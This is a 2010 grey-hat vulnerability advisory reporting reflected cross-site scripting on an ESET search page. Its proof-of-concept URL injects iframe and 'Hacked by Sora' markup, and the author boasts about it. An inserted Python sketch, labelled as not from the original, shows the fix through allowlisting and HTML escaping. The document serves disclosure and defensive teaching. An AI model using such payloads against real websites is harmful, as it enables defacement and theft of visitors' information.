[whitepaper] ESET Cross Site Scripting Exploit

___________ _______________________________
\_   _____//   _____/\_   _____/\__    ___/
 |    __)_ \_____  \  |    __)_   |    |
 |        \/        \ |        \  |    |   http://www.eset.com/
/_______  /_______  //_______  /  |____|
        \/        \/         \/   > Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://search.eset.com/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http://search.eset.com/ is vulnerable to remote cross site scripting, which can be used to
scam information from users and to execute malicious JavaScript that might remotely download
a file to the victim’s PC.

————————-
3. PROOF OF CONCEPT     |
————————-
http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox%5B%5D=en-US

Pretty much owned? >:D
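
A defensive sketch of the fix for the reflection shown in the proof of concept, added here as an example and not code from this advisory or from ESET. It decodes the PoC URL, flags the parameters that carry markup, and echoes them back through an allowlist and HTML output encoding. The allowed "type" values, the function names and the output fragment are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# The proof-of-concept URL from section 3, reproduced as sample input.
POC_URL = (
    "http://search.eset.com/esetsite/index?page=answers"
    "&type=%3Ciframe%20src=%22www.google.ca%22%3E"
    "&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail"
    "%20%5Bdot%5D%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E"
    "%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox%5B%5D=en-US"
)

# Assumption: "type" is an enumerated field; these allowed values are hypothetical.
ALLOWED_TYPES = {"search", "browse"}
MARKUP = re.compile(r"[<>\"']")


def decoded_params(url):
    """Return the query parameters as the server sees them after URL decoding."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def params_with_markup(params):
    """Names of parameters whose decoded value contains HTML metacharacters."""
    return sorted(k for k, v in params.items() if MARKUP.search(v))


def render_results_header(params):
    """Build the HTML fragment that echoes the request back, safely.

    Enumerated input is checked against an allowlist; free text is
    HTML-encoded at output time so it is displayed rather than parsed.
    """
    qtype = params.get("type", "")
    if qtype not in ALLOWED_TYPES:
        qtype = "search"  # fall back to a fixed default, never echo the raw value
    question = html.escape(params.get("question_box", ""), quote=True)
    return f'<div class="results" data-type="{qtype}">Results for: {question}</div>'


if __name__ == "__main__":
    p = decoded_params(POC_URL)
    print(params_with_markup(p))
    print(render_results_header(p))
```

With the encoding applied, the h2 and iframe tags from the PoC are displayed as literal text in the page instead of being parsed as elements.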

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora
